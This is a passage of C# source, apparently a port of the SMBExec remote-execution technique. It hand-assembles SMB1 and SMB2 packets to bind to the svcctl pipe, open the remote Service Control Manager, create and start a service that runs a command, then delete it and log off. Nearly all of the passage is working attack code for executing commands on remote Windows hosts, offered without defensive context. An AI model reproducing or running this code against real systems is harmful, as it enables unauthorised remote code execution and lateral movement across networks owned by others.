880 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
881 | Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
882 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
883 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
884 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
885 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
886 | int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
887 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
888 |
889 | if (SMB_Signing)
890 | {
891 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
892 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
893 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
894 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
895 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
896 | }
897 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
898 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
899 | if (SMB_Split_Stage >= SMB_Split_Stage_final)
900 | {
901 | SMBClientStage = "CreateServiceW_Last";
902 | }
903 | else
904 | {
905 | SMBClientStage = "CreateServiceW_Middle";
906 | }
907 |
908 | }
909 | break;
910 |
911 | case "CreateServiceW_Last":
912 | {
913 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
914 | if (SMB_Signing)
915 | {
916 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
917 | SMB_Signing_Counter += 2;
918 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
919 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
920 | }
921 | byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
922 | SMB_Split_Index_Tracker += SMB_Split_Index;
923 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
924 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
925 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
926 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
927 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
928 | int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
929 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
930 |
931 | if (SMB_Signing)
932 | {
933 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
934 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
935 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
936 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
937 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
938 | }
939 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
940 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
941 | SMBClientStage = "ReadAndXRequest";
942 | SMB_Client_Stage_Next = "StartServiceW";
943 | }
944 | break;
945 |
946 | case "StartServiceW":
947 | {
948 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "00-00-00-00")
949 | {
950 | SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
951 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
952 | if (SMB_Signing)
953 | {
954 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
955 | SMB_Signing_Counter += 2;
956 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
957 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
958 | }
959 | Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
960 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
961 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
962 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
963 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
964 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
965 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
966 | int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
967 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
968 |
969 | if (SMB_Signing)
970 | {
971 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
972 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
973 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
974 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
975 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
976 | }
977 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
978 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
979 | SMBClientStage = "ReadAndXRequest";
980 | SMB_Client_Stage_Next = "DeleteServiceW";
981 | }
982 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "31-04-00-00")
983 | {
984 | output.Append(String.Format("Service {0} creation failed on {1}", SMB_Service, Target));
985 | Console.WriteLine(output.ToString());
986 | }
987 | else
988 | {
989 | output.Append("Service Creation Fault Context Mismatch");
990 | Console.WriteLine(output.ToString());
991 | }
992 | }
993 | break;
994 | case "DeleteServiceW":
995 | {
996 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "1D-04-00-00")
997 | {
998 | if (debug) { output.Append(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_Service, Target)); }
999 | }
1000 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "02-00-00-00")
1001 | {
1002 | SMBExec_Failed = true;
1003 | if (debug) { output.Append(String.Format("Service {0} failed to start on {1}", SMB_Service, Target)); }
1004 | }
1005 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
1006 |
1007 | if (SMB_Signing)
1008 | {
1009 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
1010 | SMB_Signing_Counter += 2;
1011 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
1012 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
1013 | }
1014 |
1015 | Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
1016 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1017 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
1018 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1019 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1020 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
1021 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1022 | int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
1023 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
1024 |
1025 | if (SMB_Signing)
1026 | {
1027 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1028 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
1029 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
1030 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
1031 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1032 | }
1033 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1034 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1035 | SMBClientStage = "ReadAndXRequest";
1036 | SMB_Client_Stage_Next = "CloseServiceHandle";
1037 | SMB_Close_Service_Handle_Stage = 1;
1038 | }
1039 | break;
1040 | case "CloseServiceHandle":
1041 | {
1042 | Packet_SCM_Data = new OrderedDictionary();
1043 | if (SMB_Close_Service_Handle_Stage == 1)
1044 | {
1045 | if (debug) { output.Append(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
1046 | Service_Deleted = true;
1047 | SMB_Close_Service_Handle_Stage++;
1048 | Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
1049 | }
1050 | else
1051 | {
1052 | SMBClientStage = "CloseRequest";
1053 | Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
1054 | }
1055 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
1056 |
1057 | if (SMB_Signing)
1058 | {
1059 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
1060 | SMB_Signing_Counter += 2;
1061 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
1062 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
1063 | }
1064 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1065 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
1066 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1067 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1068 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
1069 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1070 | int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
1071 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
1072 |
1073 | if (SMB_Signing)
1074 | {
1075 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1076 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
1077 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
1078 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
1079 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1080 | }
1081 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1082 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1083 | }
1084 | break;
1085 | case "CloseRequest":
1086 | {
1087 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
1088 |
1089 | if (SMB_Signing)
1090 | {
1091 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
1092 | SMB_Signing_Counter += 2;
1093 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
1094 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
1095 | }
1096 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1097 | Packet_SMB_Data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
1098 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1099 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
1100 |
1101 | if (SMB_Signing)
1102 | {
1103 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1104 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
1105 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
1106 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
1107 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1108 | }
1109 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1110 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1111 | SMBClientStage = "TreeDisconnect";
1112 | }
1113 | break;
1114 | case "TreeDisconnect":
1115 | {
1116 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
1117 |
1118 | if (SMB_Signing)
1119 | {
1120 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
1121 | SMB_Signing_Counter += 2;
1122 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
1123 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
1124 | }
1125 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1126 | Packet_SMB_Data = SMBExec.SMBTreeDisconnectRequest();
1127 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1128 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
1129 |
1130 |
1131 | if (SMB_Signing)
1132 | {
1133 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1134 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
1135 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
1136 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
1137 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1138 | }
1139 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1140 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1141 | SMBClientStage = "Logoff";
1142 | }
1143 | break;
1144 | case "Logoff":
1145 | {
1146 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, Process_ID_Bytes, SMB_User_ID);
1147 |
1148 | if (SMB_Signing)
1149 | {
1150 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
1151 | SMB_Signing_Counter += 2;
1152 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
1153 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
1154 | }
1155 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1156 | Packet_SMB_Data = SMBExec.SMBLogoffAndXRequest();
1157 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1158 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
1159 |
1160 |
1161 | if (SMB_Signing)
1162 | {
1163 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1164 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
1165 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
1166 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
1167 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
1168 | }
1169 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
1170 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1171 | SMBClientStage = "exit";
1172 | }
1173 | break;
1174 | }
1175 |
1176 | }
1177 | }
1178 | else
1179 | {
1180 | SMBClientStage = "TreeConnect";
1181 | HMACSHA256 HMAC_SHA256 = new HMACSHA256();
1182 |
1183 | while (SMBClientStage != "exit" && SMBExec_Failed == false)
1184 | {
1185 | if (debug) { output.Append(String.Format("Current Stage {0}", SMBClientStage)); }
1186 | switch (SMBClientStage)
1187 | {
1188 | case "TreeConnect":
1189 | {
1190 | SMB2_Message_ID++;
1191 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1192 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1193 |
1194 | if (SMB_Signing)
1195 | {
1196 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1197 | }
1198 |
1199 | Packet_SMB2_Data = SMBExec.SMB2TreeConnectRequest(SMB_Path_Bytes);
1200 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1201 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1202 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1203 | if (SMB_Signing)
1204 | {
1205 | HMAC_SHA256 = new HMACSHA256();
1206 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1207 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1208 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1209 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1210 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1211 | }
1212 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1213 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1214 | SMBClientStage = "CreateRequest";
1215 | }
1216 | break;
1217 | case "CreateRequest":
1218 | {
1219 | SMB2_Tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
1220 | SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
1221 | SMB2_Message_ID++;
1222 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1223 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1224 | if (SMB_Signing)
1225 | {
1226 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1227 | }
1228 | Packet_SMB2_Data = SMBExec.SMB2CreateRequestFile(SMB_Named_Pipe_Bytes);
1229 | Packet_SMB2_Data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
1230 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1231 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1232 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1233 | if (SMB_Signing)
1234 | {
1235 | HMAC_SHA256 = new HMACSHA256();
1236 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1237 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1238 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1239 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1240 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1241 | }
1242 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1243 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1244 | SMBClientStage = "RPCBind";
1245 | }
1246 | break;
1247 | case "RPCBind":
1248 | {
1249 | SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
1250 | SMB2_Message_ID++;
1251 | SMB_File_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
1252 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1253 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1254 | if (SMB_Signing)
1255 | {
1256 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1257 | }
1258 | Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
1259 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1260 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
1261 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1262 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1263 | int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
1264 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1265 | if (SMB_Signing)
1266 | {
1267 | HMAC_SHA256 = new HMACSHA256();
1268 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1269 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1270 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1271 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1272 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1273 | }
1274 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1275 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1276 | SMBClientStage = "ReadRequest";
1277 | SMB_Client_Stage_Next = "OpenSCManagerW";
1278 | }
1279 | break;
1280 | case "ReadRequest":
1281 | {
1282 | Thread.Sleep(sleep * 1000);
1283 | SMB2_Message_ID++;
1284 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1285 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1286 | Packet_SMB2_Header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
1287 | if (SMB_Signing)
1288 | {
1289 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1290 | }
1291 |
1292 | Packet_SMB2_Data = SMBExec.SMB2ReadRequest(SMB_File_ID);
1293 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1294 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1295 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1296 | if (SMB_Signing)
1297 | {
1298 | HMAC_SHA256 = new HMACSHA256();
1299 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1300 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1301 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1302 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1303 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1304 | }
1305 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1306 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1307 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
1308 | {
1309 | SMBClientStage = SMB_Client_Stage_Next;
1310 | }
1311 | else
1312 | {
1313 | SMBClientStage = "StatusPending";
1314 | }
1315 |
1316 | }
1317 | break;
1318 |
1319 | case "StatusPending":
1320 | {
1321 | SMBClientStream.Read(SMBClientReceive, 0, SMBClientReceive.Length);
1322 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
1323 | {
1324 | SMBClientStage = SMB_Client_Stage_Next;
1325 | }
1326 | }
1327 | break;
1328 | case "OpenSCManagerW":
1329 | {
1330 | SMB2_Message_ID = 30;
1331 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1332 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1333 | if (SMB_Signing)
1334 | {
1335 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1336 | }
1337 | Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
1338 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1339 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
1340 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1341 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
1342 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1343 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1344 | int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
1345 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1346 |
1347 | if (SMB_Signing)
1348 | {
1349 | HMAC_SHA256 = new HMACSHA256();
1350 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1351 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1352 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1353 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
